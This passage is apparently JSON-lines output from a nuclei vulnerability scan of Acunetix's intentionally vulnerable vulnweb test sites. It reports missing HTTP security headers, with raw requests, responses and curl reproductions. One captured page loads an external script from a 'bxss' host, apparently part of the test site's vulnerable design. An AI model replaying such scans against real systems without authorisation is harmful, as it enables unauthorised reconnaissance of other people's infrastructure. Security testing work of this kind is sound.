\\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:58.787628617Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:58.918234887Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca 